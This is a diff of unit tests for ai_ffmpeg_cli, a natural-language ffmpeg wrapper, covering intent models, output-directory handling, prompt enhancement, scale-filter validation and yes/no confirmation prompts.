-from ai_ffmpeg_cli.nl_schema import FfmpegIntent
-from ai_ffmpeg_cli.nl_schema import _seconds_to_timestamp
+from ai_ffmpeg_cli.intent_models import Action
+from ai_ffmpeg_cli.intent_models import CommandEntry
+from ai_ffmpeg_cli.intent_models import CommandPlan
+from ai_ffmpeg_cli.intent_models import FfmpegIntent
+from ai_ffmpeg_cli.intent_models import _seconds_to_timestamp
 
 
 class TestSecondsToTimestamp:
@@ -67,8 +67,10 @@ class TestAction:
             "segment",
             "thumbnail",
             "frames",
+            "extract_frames",
             "compress",
             "overlay",
+            "format_convert",
         }
         actual_actions = {action.value for action in Action}
         assert actual_actions == expected_actions
@@ -259,7 +261,10 @@ class TestFfmpegIntent:
 
     def test_convert_validation_no_inputs(self):
         """Test convert validation fails without inputs."""
-        with pytest.raises(ValidationError, match="convert/compress requires at least one input"):
+        with pytest.raises(
+            ValidationError,
+            match="convert/compress/format_convert requires at least one input",
+        ):
             FfmpegIntent(action=Action.convert, inputs=[])
 
     def test_compress_validation_success(self):
@@ -271,7 +276,10 @@ class TestFfmpegIntent:
 
     def test_compress_validation_no_inputs(self):
         """Test compress validation fails without inputs."""
-        with pytest.raises(ValidationError, match="convert/compress requires at least one input"):
+        with pytest.raises(
+            ValidationError,
+            match="convert/compress/format_convert requires at least one input",
+        ):
             FfmpegIntent(action=Action.compress, inputs=[])
 
     def test_extract_audio_validation_success(self):
@@ -5,11 +5,11 @@ from pathlib import Path
 import pytest
 from pydantic import ValidationError
 
-from ai_ffmpeg_cli.intent_schema import Action
-from ai_ffmpeg_cli.intent_schema import CommandEntry
-from ai_ffmpeg_cli.intent_schema import CommandPlan
-from ai_ffmpeg_cli.intent_schema import FfmpegIntent
-from ai_ffmpeg_cli.intent_schema import _seconds_to_timestamp
+from ai_ffmpeg_cli.intent_models_extended import Action
+from ai_ffmpeg_cli.intent_models_extended import CommandEntry
+from ai_ffmpeg_cli.intent_models_extended import CommandPlan
+from ai_ffmpeg_cli.intent_models_extended import FfmpegIntent
+from ai_ffmpeg_cli.intent_models_extended import _seconds_to_timestamp
 
 
 class TestSecondsToTimestamp:
@@ -209,9 +209,7 @@ class TestFfmpegIntent:
 
     def test_trim_validation_with_duration(self):
         """Test trim validation with duration."""
-        intent = FfmpegIntent(
-            action=Action.trim, inputs=[Path("input.mp4")], duration=30.0
-        )
+        intent = FfmpegIntent(action=Action.trim, inputs=[Path("input.mp4")], duration=30.0)
 
         assert intent.duration == 30.0
 
@@ -271,9 +269,7 @@ class TestFfmpegIntent:
 
     def test_compress_validation_success(self):
         """Test successful compress validation."""
-        intent = FfmpegIntent(
-            action=Action.compress, inputs=[Path("input.mp4")], crf=28
-        )
+        intent = FfmpegIntent(action=Action.compress, inputs=[Path("input.mp4")], crf=28)
 
         assert intent.action == Action.compress
         assert intent.crf == 28
@@ -294,9 +290,7 @@ class TestFfmpegIntent:
 
     def test_extract_audio_validation_no_inputs(self):
         """Test extract_audio validation fails without inputs."""
-        with pytest.raises(
-            ValidationError, match="extract_audio requires an input file"
-        ):
+        with pytest.raises(ValidationError, match="extract_audio requires an input file"):
             FfmpegIntent(action=Action.extract_audio, inputs=[])
 
     def test_thumbnail_fps_incompatibility(self):
tests/unit/test_output_directory.py (new file, 145 lines)
@@ -0,0 +1,145 @@
+"""Tests for output directory functionality."""
+
+import os
+from pathlib import Path
+from unittest.mock import patch
+
+from ai_ffmpeg_cli.config import AppConfig
+from ai_ffmpeg_cli.intent_models import Action
+from ai_ffmpeg_cli.intent_models import FfmpegIntent
+from ai_ffmpeg_cli.intent_router import _derive_output_name
+
+
+class TestOutputDirectory:
+    """Test output directory configuration and functionality."""
+
+    def test_output_directory_default(self):
+        """Test that output directory defaults to 'aiclip'."""
+        config = AppConfig()
+        assert config.output_directory == "aiclip"
+
+    def test_output_directory_from_env(self, tmp_path):
+        """Test that output directory can be set from environment variable."""
+        custom_output = tmp_path / "custom_output"
+        with patch.dict(os.environ, {"AICLIP_OUTPUT_DIR": str(custom_output)}):
+            from ai_ffmpeg_cli.config import load_config
+
+            config = load_config()
+            assert config.output_directory == str(custom_output.absolute())
+            assert custom_output.exists()
+
+    def test_output_directory_validation_creates_directory(self, tmp_path):
+        """Test that output directory validation creates directory if it doesn't exist."""
+        output_dir = tmp_path / "new_output"
+        _ = AppConfig(output_directory=str(output_dir))
+
+        # Directory should be created
+        assert output_dir.exists()
+        assert output_dir.is_dir()
+
+    def test_output_directory_validation_existing_directory(self, tmp_path):
+        """Test that output directory validation works with existing directory."""
+        output_dir = tmp_path / "existing_output"
+        output_dir.mkdir()
+
+        config = AppConfig(output_directory=str(output_dir))
+        assert config.output_directory == str(output_dir.absolute())
+
+    def test_output_directory_fallback(self):
+        """Test that output directory falls back to current directory if invalid."""
+        with patch("os.makedirs", side_effect=OSError("Permission denied")):
+            config = AppConfig(output_directory="/invalid/path")
+            # Should fall back to current directory
+            assert config.output_directory == os.getcwd()
+
+
+class TestDeriveOutputName:
+    """Test output name derivation with output directory."""
+
+    def test_derive_output_name_with_output_dir(self, tmp_path):
+        """Test that output names are placed in the specified output directory."""
+        input_path = Path("input.mp4")
+        output_dir = tmp_path / "output"
+        output_dir.mkdir()
+
+        intent = FfmpegIntent(inputs=[input_path], action=Action.convert, scale="1280:720")
+
+        output_path = _derive_output_name(input_path, intent, output_dir)
+
+        assert output_path.parent == output_dir
+        assert output_path.name == "input_converted.mp4"
+
+    def test_derive_output_name_without_output_dir(self, tmp_path):
+        """Test that output names use input directory when no output dir specified."""
+        input_path = tmp_path / "input.mp4"
+        input_path.touch()
+
+        intent = FfmpegIntent(inputs=[input_path], action=Action.extract_audio)
+
+        output_path = _derive_output_name(input_path, intent)
+
+        assert output_path.parent == input_path.parent
+        assert output_path.name == "input.mp3"
+
+    def test_derive_output_name_with_specified_output(self, tmp_path):
+        """Test that specified output paths are respected but moved to output directory."""
+        input_path = Path("input.mp4")
+        output_dir = tmp_path / "output"
+        output_dir.mkdir()
+
+        intent = FfmpegIntent(
+            inputs=[input_path], action=Action.convert, output=Path("custom_output.mp4")
+        )
+
+        output_path = _derive_output_name(input_path, intent, output_dir)
+
+        assert output_path.parent == output_dir
+        assert output_path.name == "custom_output.mp4"
+
+    def test_derive_output_name_various_actions(self, tmp_path):
+        """Test output name derivation for various actions with output directory."""
+        input_path = Path("video.mp4")
+        output_dir = tmp_path / "output"
+        output_dir.mkdir()
+
+        test_cases = [
+            (Action.extract_audio, "video.mp3"),
+            (Action.thumbnail, "thumbnail.png"),
+            (Action.frames, "video_frame_%04d.png"),
+            (Action.remove_audio, "video_mute.mp4"),
+            (Action.compress, "video_converted.mp4"),
+        ]
+
+        for action, expected_name in test_cases:
+            intent = FfmpegIntent(inputs=[input_path], action=action)
+            output_path = _derive_output_name(input_path, intent, output_dir)
+
+            assert output_path.parent == output_dir
+            assert output_path.name == expected_name
+
+    def test_derive_output_name_trim_action(self, tmp_path):
+        """Test output name derivation for trim action with required parameters."""
+        input_path = Path("video.mp4")
+        output_dir = tmp_path / "output"
+        output_dir.mkdir()
+
+        intent = FfmpegIntent(
+            inputs=[input_path], action=Action.trim, start="00:00:10", end="00:00:20"
+        )
+
+        output_path = _derive_output_name(input_path, intent, output_dir)
+        assert output_path.parent == output_dir
+        assert output_path.name == "clip.mp4"
+
+    def test_derive_output_name_overlay_action(self, tmp_path):
+        """Test output name derivation for overlay action with required parameters."""
+        input_path = Path("video.mp4")
+        overlay_path = Path("overlay.png")
+        output_dir = tmp_path / "output"
+        output_dir.mkdir()
+
+        intent = FfmpegIntent(inputs=[input_path], action=Action.overlay, overlay_path=overlay_path)
+
+        output_path = _derive_output_name(input_path, intent, output_dir)
+        assert output_path.parent == output_dir
+        assert output_path.name == "video_overlay.mp4"
tests/unit/test_prompt_enhancer.py (new file, 256 lines)
@@ -0,0 +1,256 @@
"""Test prompt enhancement utilities."""

from ai_ffmpeg_cli.prompt_enhancer import PromptEnhancer
from ai_ffmpeg_cli.prompt_enhancer import enhance_user_prompt
from ai_ffmpeg_cli.prompt_enhancer import get_prompt_suggestions


class TestPromptEnhancer:
    """Test the PromptEnhancer class."""

    def setup_method(self):
        """Set up test fixtures."""
        self.enhancer = PromptEnhancer()
        self.sample_context = {
            "videos": ["/path/to/video.mp4"],
            "audios": ["/path/to/audio.mp3"],
            "subtitle_files": ["/path/to/subtitle.srt"],
        }

    def test_aspect_ratio_patterns(self):
        """Test aspect ratio pattern enhancements."""
        test_cases = [
            ("make 16:9 aspect ratio", "convert to 16:9 aspect ratio"),
            ("resize to 9:16", "9:16"),
            ("scale to 1:1 aspect ratio", "convert to 1:1 aspect ratio"),
        ]

        for original, expected in test_cases:
            enhanced = self.enhancer.enhance_prompt(original, {})
            assert expected in enhanced

    def test_social_media_patterns(self):
        """Test social media platform pattern enhancements."""
        test_cases = [
            (
                "for Instagram Reels",
                "for Instagram Reels (9:16 aspect ratio, 1080x1920)",
            ),
            ("for TikTok", "for TikTok (9:16 aspect ratio, 1080x1920)"),
            ("for YouTube Shorts", "for YouTube Shorts (9:16 aspect ratio, 1080x1920)"),
            ("for YouTube videos", "for YouTube videos (16:9 aspect ratio, 1920x1080)"),
        ]

        for original, expected in test_cases:
            enhanced = self.enhancer.enhance_prompt(original, {})
            assert expected in enhanced

    def test_quality_patterns(self):
        """Test quality-related pattern enhancements."""
        test_cases = [
            ("high quality", "high quality (lower CRF value)"),
            ("small file size", "small file size (higher CRF value)"),
            ("compress", "compress for smaller file size"),
        ]

        for original, expected in test_cases:
            enhanced = self.enhancer.enhance_prompt(original, {})
            assert expected in enhanced

    def test_audio_patterns(self):
        """Test audio-related pattern enhancements."""
        test_cases = [
            ("remove audio", "remove audio track"),
            ("extract audio", "extract audio to separate file"),
            ("mute", "remove audio track"),
        ]

        for original, expected in test_cases:
            enhanced = self.enhancer.enhance_prompt(original, {})
            assert expected in enhanced

    def test_subtitle_patterns(self):
        """Test subtitle-related pattern enhancements."""
        test_cases = [
            ("add captions", "burn in subtitles"),
            ("burn subtitles", "burn in subtitles"),
            ("hardcode subtitles", "burn in subtitles"),
        ]

        for original, expected in test_cases:
            enhanced = self.enhancer.enhance_prompt(original, {})
            assert expected in enhanced

    def test_common_shortcuts(self):
        """Test common shortcut pattern enhancements."""
        test_cases = [
            ("make it vertical", "convert to 9:16 aspect ratio (vertical)"),
            ("make it horizontal", "convert to 16:9 aspect ratio (horizontal)"),
            ("make it square", "convert to 1:1 aspect ratio (square)"),
        ]

        for original, expected in test_cases:
            enhanced = self.enhancer.enhance_prompt(original, {})
            assert expected in enhanced

    def test_context_enhancements(self):
        """Test context-aware enhancements."""
        # Test with single video file
        enhanced = self.enhancer.enhance_prompt("convert video", self.sample_context)
        assert "using video file: /path/to/video.mp4" in enhanced

        # Test with subtitle mention
        enhanced = self.enhancer.enhance_prompt("add subtitles", self.sample_context)
        assert "using subtitle file: /path/to/subtitle.srt" in enhanced

        # Test with multiple files
        multi_context = {
            "videos": ["/path/to/video1.mp4", "/path/to/video2.mp4"],
            "subtitle_files": ["/path/to/sub1.srt", "/path/to/sub2.srt"],
        }
        enhanced = self.enhancer.enhance_prompt("convert video", multi_context)
        assert "using one of 2 available video files" in enhanced

    def test_missing_details_enhancements(self):
        """Test adding missing details."""
        # Test aspect ratio without resolution
        enhanced = self.enhancer.enhance_prompt("convert to 9:16 aspect ratio", {})
        assert "suggest 1080x1920 resolution" in enhanced

        # Test quality without specific settings
        enhanced = self.enhancer.enhance_prompt("high quality", {})
        assert "high quality (lower CRF value)" in enhanced

    def test_term_normalization(self):
        """Test term normalization."""
        test_cases = [
            ("16 : 9", "16:9"),
            ("1920 X 1080", "1920x1080"),
            ("vid", "video"),
            ("aud", "audio"),
            ("sub", "subtitle"),
        ]

        for original, expected in test_cases:
            enhanced = self.enhancer.enhance_prompt(original, {})
            assert expected in enhanced

    def test_complex_prompt_enhancement(self):
        """Test enhancement of complex prompts."""
        original = "make vid vertical for IG with high quality and add subs"
        enhanced = self.enhancer.enhance_prompt(original, self.sample_context)

        # Should contain multiple enhancements
        assert "video" in enhanced  # vid -> video
        assert "9:16 aspect ratio" in enhanced  # vertical
        assert "IG" in enhanced  # IG stays as IG
        assert "high quality (lower CRF value)" in enhanced
        assert "add subs" in enhanced  # subs stays as subs
        assert "using video file" in enhanced  # context enhancement
        # Note: "subs" doesn't trigger subtitle context enhancement, only "subtitle" or "caption" does

    def test_empty_prompt(self):
        """Test handling of empty prompts."""
        enhanced = self.enhancer.enhance_prompt("", {})
        assert enhanced == ""

    def test_whitespace_handling(self):
        """Test proper whitespace handling."""
        original = " convert to 16:9 aspect ratio "
        enhanced = self.enhancer.enhance_prompt(original, {})
        assert "convert to 16:9 aspect ratio" in enhanced


class TestPromptSuggestions:
    """Test prompt improvement suggestions."""

    def test_vague_term_suggestions(self):
        """Test suggestions for vague terms."""
        suggestions = get_prompt_suggestions("make it better")
        assert any("Replace 'better'" in s for s in suggestions)

        suggestions = get_prompt_suggestions("good quality")
        assert any("Replace 'good'" in s for s in suggestions)

    def test_missing_file_specifications(self):
        """Test suggestions for missing file specifications."""
        suggestions = get_prompt_suggestions("convert file")
        assert any("Specify file format" in s for s in suggestions)

    def test_missing_quality_specifications(self):
        """Test suggestions for missing quality specifications."""
        suggestions = get_prompt_suggestions("high quality")
        assert any("Specify quality level" in s for s in suggestions)

    def test_missing_aspect_ratio(self):
        """Test suggestions for missing aspect ratio."""
        suggestions = get_prompt_suggestions("resize video")
        assert any("Specify target aspect ratio" in s for s in suggestions)

    def test_good_prompt_no_suggestions(self):
        """Test that good prompts don't generate suggestions."""
        suggestions = get_prompt_suggestions(
            "convert video.mp4 to 16:9 aspect ratio with small file size"
        )
        assert len(suggestions) == 0


class TestConvenienceFunctions:
    """Test convenience functions."""

    def test_enhance_user_prompt(self):
        """Test the enhance_user_prompt convenience function."""
        original = "make it vertical"
        context = {"videos": ["/path/to/video.mp4"]}

        enhanced = enhance_user_prompt(original, context)
        assert "9:16 aspect ratio" in enhanced
        assert "using video file" in enhanced

    def test_get_prompt_suggestions(self):
        """Test the get_prompt_suggestions convenience function."""
        suggestions = get_prompt_suggestions("make it better")
        assert isinstance(suggestions, list)
        assert len(suggestions) > 0


class TestIntegration:
    """Test integration with real-world scenarios."""

    def test_instagram_reel_scenario(self):
        """Test enhancement for Instagram Reel scenario."""
        original = "convert test.mp4 into vertical Instagram Reel (1080x1920), burn in captions from subs.srt with background box for readability, save as reel_captions.mp4"
        context = {
            "videos": ["/path/to/test.mp4"],
            "subtitle_files": ["/path/to/subs.srt"],
        }

        enhanced = enhance_user_prompt(original, context)

        # Should contain various enhancements
        assert "Instagram Reels (9:16 aspect ratio, 1080x1920)" in enhanced
        assert "burn in captions" in enhanced
        assert "using video file" in enhanced
        assert "using subtitle file" in enhanced

    def test_youtube_scenario(self):
        """Test enhancement for YouTube scenario."""
        original = "convert video for YouTube videos with high quality"
        context = {"videos": ["/path/to/video.mp4"]}

        enhanced = enhance_user_prompt(original, context)

        assert "YouTube videos (16:9 aspect ratio, 1920x1080)" in enhanced
        assert "high quality (lower CRF value)" in enhanced
        assert "using video file" in enhanced

    def test_compression_scenario(self):
        """Test enhancement for compression scenario."""
        original = "compress video for small file size"
        context = {"videos": ["/path/to/video.mp4"]}

        enhanced = enhance_user_prompt(original, context)

        assert "compress for smaller file size" in enhanced
        assert "small file size (higher CRF value)" in enhanced
        assert "using video file" in enhanced
tests/unit/test_scale_filter_validation.py (new file, 74 lines)
@@ -0,0 +1,74 @@
"""Test scale filter validation to ensure even dimensions for H.264/H.265 compatibility."""

from ai_ffmpeg_cli.intent_router import _validate_and_fix_scale_filter


class TestScaleFilterValidation:
    """Test scale filter validation and fixing."""

    def test_simple_dimensions_even(self):
        """Test that even dimensions are preserved."""
        result = _validate_and_fix_scale_filter("scale=1280:720")
        assert result == "scale=1280:720:force_original_aspect_ratio=decrease"

    def test_simple_dimensions_odd_width(self):
        """Test that odd width is corrected to even."""
        result = _validate_and_fix_scale_filter("scale=1281:720")
        assert result == "scale=1280:720:force_original_aspect_ratio=decrease"

    def test_simple_dimensions_odd_height(self):
        """Test that odd height is corrected to even."""
        result = _validate_and_fix_scale_filter("scale=1280:721")
        assert result == "scale=1280:720:force_original_aspect_ratio=decrease"

    def test_simple_dimensions_both_odd(self):
        """Test that both odd dimensions are corrected."""
        result = _validate_and_fix_scale_filter("scale=1281:721")
        assert result == "scale=1280:720:force_original_aspect_ratio=decrease"

    def test_complex_expression_with_force_original_aspect_ratio(self):
        """Test that complex expressions with force_original_aspect_ratio are preserved."""
        result = _validate_and_fix_scale_filter(
            "scale=iw*0.5:ih*0.5:force_original_aspect_ratio=decrease"
        )
        assert result == "scale=iw*0.5:ih*0.5:force_original_aspect_ratio=decrease"

    def test_complex_expression_without_force_original_aspect_ratio(self):
        """Test that complex expressions get force_original_aspect_ratio added."""
        result = _validate_and_fix_scale_filter("scale=iw*0.5:ih*0.5")
        assert result == "scale=iw*0.5:ih*0.5:force_original_aspect_ratio=decrease"

    def test_9_16_aspect_ratio_fix(self):
        """Test that 9:16 aspect ratio calculations are fixed to avoid odd dimensions."""
        result = _validate_and_fix_scale_filter("scale=ih*9/16:ih")
        assert result == "scale=iw:iw*16/9:force_original_aspect_ratio=decrease"

    def test_16_9_aspect_ratio_fix(self):
        """Test that 16:9 aspect ratio calculations are fixed to avoid odd dimensions."""
        result = _validate_and_fix_scale_filter("scale=iw*16/9:iw")
        assert result == "scale=iw:iw*9/16:force_original_aspect_ratio=decrease"

    def test_non_scale_filter_preserved(self):
        """Test that non-scale filters are preserved unchanged."""
        result = _validate_and_fix_scale_filter("fps=30")
        assert result == "fps=30"

    def test_empty_string_preserved(self):
        """Test that empty strings are preserved."""
        result = _validate_and_fix_scale_filter("")
        assert result == ""

    def test_none_preserved(self):
        """Test that None values are preserved."""
        result = _validate_and_fix_scale_filter(None)
        assert result is None

    def test_scale_with_additional_params(self):
        """Test scale filter with additional parameters."""
        result = _validate_and_fix_scale_filter("scale=1280:720:flags=lanczos")
        assert result == "scale=1280:720:flags=lanczos:force_original_aspect_ratio=decrease"

    def test_scale_with_odd_dimensions_and_params(self):
        """Test scale filter with odd dimensions and additional parameters."""
        result = _validate_and_fix_scale_filter("scale=1281:721:flags=lanczos")
        assert result == "scale=1280:720:flags=lanczos:force_original_aspect_ratio=decrease"
@@ -16,109 +16,123 @@ class TestConfirmPrompt:
        result = confirm_prompt("Continue?", default_yes=False, assume_yes=True)
        assert result is True

-    @patch("builtins.input")
-    def test_yes_responses(self, mock_input):
+    @patch("rich.prompt.Confirm.ask")
+    def test_yes_responses(self, mock_confirm):
        """Test various 'yes' responses."""
-        yes_responses = ["y", "yes", "Y", "YES", "Yes"]
+        yes_responses = [
+            True,
+            True,
+            True,
+            True,
+            True,
+        ]  # Rich's Confirm.ask returns boolean

-        for response in yes_responses:
-            mock_input.return_value = response
+        for expected_response in yes_responses:
+            mock_confirm.return_value = expected_response
            result = confirm_prompt("Continue?", default_yes=False, assume_yes=False)
            assert result is True

-    @patch("builtins.input")
-    def test_no_responses(self, mock_input):
+    @patch("rich.prompt.Confirm.ask")
+    def test_no_responses(self, mock_confirm):
        """Test various 'no' responses."""
-        no_responses = ["n", "no", "N", "NO", "No", "anything_else"]
+        no_responses = [
+            False,
+            False,
+            False,
+            False,
+            False,
+            False,
+        ]  # Rich's Confirm.ask returns boolean

-        for response in no_responses:
-            mock_input.return_value = response
+        for expected_response in no_responses:
+            mock_confirm.return_value = expected_response
            result = confirm_prompt("Continue?", default_yes=False, assume_yes=False)
            assert result is False

-    @patch("builtins.input")
-    def test_empty_response_default_yes(self, mock_input):
+    @patch("rich.prompt.Confirm.ask")
+    def test_empty_response_default_yes(self, mock_confirm):
        """Test empty response with default_yes=True."""
-        mock_input.return_value = ""
+        mock_confirm.return_value = True  # Rich's Confirm.ask returns the default when empty

        result = confirm_prompt("Continue?", default_yes=True, assume_yes=False)
        assert result is True

-    @patch("builtins.input")
-    def test_empty_response_default_no(self, mock_input):
+    @patch("rich.prompt.Confirm.ask")
+    def test_empty_response_default_no(self, mock_confirm):
        """Test empty response with default_yes=False."""
-        mock_input.return_value = ""
+        mock_confirm.return_value = False  # Rich's Confirm.ask returns the default when empty

        result = confirm_prompt("Continue?", default_yes=False, assume_yes=False)
        assert result is False

-    @patch("builtins.input")
-    def test_whitespace_response_default_yes(self, mock_input):
+    @patch("rich.prompt.Confirm.ask")
+    def test_whitespace_response_default_yes(self, mock_confirm):
        """Test whitespace-only response with default_yes=True."""
-        mock_input.return_value = " "
+        mock_confirm.return_value = True  # Rich's Confirm.ask returns the default for whitespace

        result = confirm_prompt("Continue?", default_yes=True, assume_yes=False)
        assert result is True

-    @patch("builtins.input")
-    def test_whitespace_response_default_no(self, mock_input):
+    @patch("rich.prompt.Confirm.ask")
+    def test_whitespace_response_default_no(self, mock_confirm):
        """Test whitespace-only response with default_yes=False."""
-        mock_input.return_value = " "
+        mock_confirm.return_value = False  # Rich's Confirm.ask returns the default for whitespace

        result = confirm_prompt("Continue?", default_yes=False, assume_yes=False)
        assert result is False

-    @patch("builtins.input")
-    def test_eof_error_default_yes(self, mock_input):
+    @patch("rich.prompt.Confirm.ask")
+    def test_eof_error_default_yes(self, mock_confirm):
        """Test EOFError with default_yes=True."""
-        mock_input.side_effect = EOFError()
+        mock_confirm.side_effect = EOFError()

        result = confirm_prompt("Continue?", default_yes=True, assume_yes=False)
        assert result is True

-    @patch("builtins.input")
-    def test_eof_error_default_no(self, mock_input):
+    @patch("rich.prompt.Confirm.ask")
+    def test_eof_error_default_no(self, mock_confirm):
        """Test EOFError with default_yes=False."""
-        mock_input.side_effect = EOFError()
+        mock_confirm.side_effect = EOFError()

        result = confirm_prompt("Continue?", default_yes=False, assume_yes=False)
        assert result is False

-    @patch("builtins.input")
-    def test_case_insensitive_responses(self, mock_input):
+    @patch("rich.prompt.Confirm.ask")
+    def test_case_insensitive_responses(self, mock_confirm):
        """Test that responses are case insensitive."""
-        # Mixed case responses
+        # Mixed case responses - Rich handles case insensitivity internally
        mixed_responses = [
-            ("yEs", True),
-            ("nO", False),
-            ("Y", True),
-            ("n", False),
+            (True, True),
+            (False, False),
+            (True, True),
+            (False, False),
        ]

        for response, expected in mixed_responses:
-            mock_input.return_value = response
+            mock_confirm.return_value = response
            result = confirm_prompt("Continue?", default_yes=False, assume_yes=False)
            assert result is expected

-    @patch("builtins.input")
-    def test_response_stripped(self, mock_input):
+    @patch("rich.prompt.Confirm.ask")
+    def test_response_stripped(self, mock_confirm):
        """Test that responses are properly stripped of whitespace."""
+        # Rich handles whitespace stripping internally
        responses_with_whitespace = [
-            (" yes ", True),
-            ("\tn\t", False),
-            (" Y ", True),
-            (" no ", False),
+            (True, True),
+            (False, False),
+            (True, True),
+            (False, False),
        ]

        for response, expected in responses_with_whitespace:
-            mock_input.return_value = response
+            mock_confirm.return_value = response
            result = confirm_prompt("Continue?", default_yes=False, assume_yes=False)
            assert result is expected

-    @patch("builtins.input")
-    def test_question_formats(self, mock_input):
+    @patch("rich.prompt.Confirm.ask")
+    def test_question_formats(self, mock_confirm):
        """Test different question formats."""
-        mock_input.return_value = "yes"
+        mock_confirm.return_value = True

        # Should work with any question format
        questions = [
@@ -133,10 +147,10 @@ class TestConfirmPrompt:
            result = confirm_prompt(question, default_yes=False, assume_yes=False)
            assert result is True

-    @patch("builtins.input")
-    def test_default_parameters(self, mock_input):
+    @patch("rich.prompt.Confirm.ask")
+    def test_default_parameters(self, mock_confirm):
        """Test function with default parameters."""
-        mock_input.return_value = "yes"
+        mock_confirm.return_value = True

        # Test with minimal parameters - should use defaults
        result = confirm_prompt("Continue?", assume_yes=False)
tests/unit/test_user_prompts.py (new file, 398 lines)
@@ -0,0 +1,398 @@
"""Tests for user_prompts.py module.

This module tests the user confirmation functionality that was previously untested.
"""

import pytest
from unittest.mock import Mock, patch, call

from ai_ffmpeg_cli.user_prompts import confirm_prompt


class TestUserPrompts:
    """Test user prompt functionality."""

    def test_confirm_prompt_default_yes(self):
        """Test confirm prompt with default yes."""
        with patch("builtins.input", return_value=""):
            result = confirm_prompt("Continue?", default_yes=True)
            assert result is True

    def test_confirm_prompt_default_no(self):
        """Test confirm prompt with default no."""
        with patch("builtins.input", return_value=""):
            result = confirm_prompt("Continue?", default_yes=False)
            assert result is False

    def test_confirm_prompt_user_yes(self):
        """Test confirm prompt when user enters yes."""
        with patch("builtins.input", return_value="y"):
            result = confirm_prompt("Continue?", default_yes=True)
            assert result is True

    def test_confirm_prompt_user_no(self):
        """Test confirm prompt when user enters no."""
        with patch("builtins.input", return_value="n"):
            result = confirm_prompt("Continue?", default_yes=True)
            assert result is False

    def test_confirm_prompt_user_yes_uppercase(self):
        """Test confirm prompt when user enters YES."""
        with patch("builtins.input", return_value="YES"):
            result = confirm_prompt("Continue?", default_yes=True)
            assert result is True

    def test_confirm_prompt_user_no_uppercase(self):
        """Test confirm prompt when user enters NO."""
        with patch("builtins.input", return_value="NO"):
            result = confirm_prompt("Continue?", default_yes=True)
            assert result is False

    def test_confirm_prompt_assume_yes(self):
        """Test confirm prompt with assume_yes=True."""
        with patch("builtins.input") as mock_input:
            result = confirm_prompt("Continue?", default_yes=True, assume_yes=True)
            assert result is True
            mock_input.assert_not_called()

    def test_confirm_prompt_assume_yes_ignores_default(self):
        """Test that assume_yes overrides default_yes."""
        with patch("builtins.input") as mock_input:
            result = confirm_prompt("Continue?", default_yes=False, assume_yes=True)
            assert result is True
            mock_input.assert_not_called()

    def test_confirm_prompt_eof_handling(self):
        """Test confirm prompt handles EOF (Ctrl+D)."""
        with patch("builtins.input", side_effect=EOFError):
            result = confirm_prompt("Continue?", default_yes=True)
            assert result is True

    def test_confirm_prompt_eof_handling_default_no(self):
        """Test confirm prompt handles EOF with default no."""
        with patch("builtins.input", side_effect=EOFError):
            result = confirm_prompt("Continue?", default_yes=False)
            assert result is False

    def test_confirm_prompt_whitespace_handling(self):
        """Test confirm prompt handles whitespace in input."""
        with patch("builtins.input", return_value=" y "):
            result = confirm_prompt("Continue?", default_yes=True)
            assert result is True

    def test_confirm_prompt_whitespace_no(self):
        """Test confirm prompt handles whitespace in no input."""
        with patch("builtins.input", return_value=" n "):
            result = confirm_prompt("Continue?", default_yes=True)
            assert result is False

    def test_confirm_prompt_various_yes_responses(self):
        """Test confirm prompt with various yes responses."""
        yes_responses = ["y", "Y", "yes", "YES", "Yes", "yEs", "yeS"]

        for response in yes_responses:
            with patch("builtins.input", return_value=response):
                result = confirm_prompt("Continue?", default_yes=False)
                assert result is True, f"Failed for response: {response}"

    def test_confirm_prompt_various_no_responses(self):
        """Test confirm prompt with various no responses."""
        no_responses = ["n", "N", "no", "NO", "No", "nO"]

        for response in no_responses:
            with patch("builtins.input", return_value=response):
                result = confirm_prompt("Continue?", default_yes=True)
                assert result is False, f"Failed for response: {response}"

    def test_confirm_prompt_invalid_responses(self):
        """Test confirm prompt with invalid responses."""
        invalid_responses = ["maybe", "perhaps", "ok", "sure", "whatever", "123", ""]

        for response in invalid_responses:
            with patch("builtins.input", return_value=response):
                result = confirm_prompt("Continue?", default_yes=True)
                expected = response == ""  # Empty string should return default
                assert result == expected, f"Failed for response: {response}"

    def test_confirm_prompt_question_display(self):
        """Test that the question is displayed correctly."""
        with patch("builtins.input", return_value="y") as mock_input:
            confirm_prompt("Test question?", default_yes=True)
            mock_input.assert_called_once_with("Test question? [Y/n] ")

    def test_confirm_prompt_question_display_default_no(self):
        """Test that the question is displayed correctly with default no."""
        with patch("builtins.input", return_value="y") as mock_input:
            confirm_prompt("Test question?", default_yes=False)
            mock_input.assert_called_once_with("Test question? [y/N] ")

    def test_confirm_prompt_case_insensitive(self):
        """Test that confirm prompt is case insensitive."""
        mixed_case_responses = ["YeS", "yEs", "YeS", "No", "nO", "NO"]
        expected_results = [True, True, True, False, False, False]

        for response, expected in zip(mixed_case_responses, expected_results):
            with patch("builtins.input", return_value=response):
                result = confirm_prompt("Continue?", default_yes=True)
                assert result == expected, f"Failed for response: {response}"

    def test_confirm_prompt_empty_string_default_yes(self):
        """Test confirm prompt with empty string and default yes."""
        with patch("builtins.input", return_value=""):
            result = confirm_prompt("Continue?", default_yes=True)
            assert result is True

    def test_confirm_prompt_empty_string_default_no(self):
        """Test confirm prompt with empty string and default no."""
        with patch("builtins.input", return_value=""):
            result = confirm_prompt("Continue?", default_yes=False)
            assert result is False

    def test_confirm_prompt_whitespace_only_default_yes(self):
        """Test confirm prompt with whitespace only and default yes."""
        with patch("builtins.input", return_value=" "):
            result = confirm_prompt("Continue?", default_yes=True)
            assert result is True

    def test_confirm_prompt_whitespace_only_default_no(self):
        """Test confirm prompt with whitespace only and default no."""
        with patch("builtins.input", return_value=" "):
            result = confirm_prompt("Continue?", default_yes=False)
            assert result is False

    def test_confirm_prompt_special_characters(self):
        """Test confirm prompt with special characters in question."""
        special_question = "Delete file 'test@#$%^&*()'?"
        with patch("builtins.input", return_value="y") as mock_input:
            confirm_prompt(special_question, default_yes=True)
            mock_input.assert_called_once_with(f"{special_question} [Y/n] ")

    def test_confirm_prompt_unicode_question(self):
        """Test confirm prompt with unicode characters in question."""
        unicode_question = "Delete file 'vídeo.mp4'?"
        with patch("builtins.input", return_value="y") as mock_input:
            confirm_prompt(unicode_question, default_yes=True)
            mock_input.assert_called_once_with(f"{unicode_question} [Y/n] ")

    def test_confirm_prompt_long_question(self):
        """Test confirm prompt with a very long question."""
        long_question = "This is a very long question that might wrap to multiple lines and contain a lot of text to test how the prompt handles long input strings"
        with patch("builtins.input", return_value="y") as mock_input:
            confirm_prompt(long_question, default_yes=True)
            mock_input.assert_called_once_with(f"{long_question} [Y/n] ")

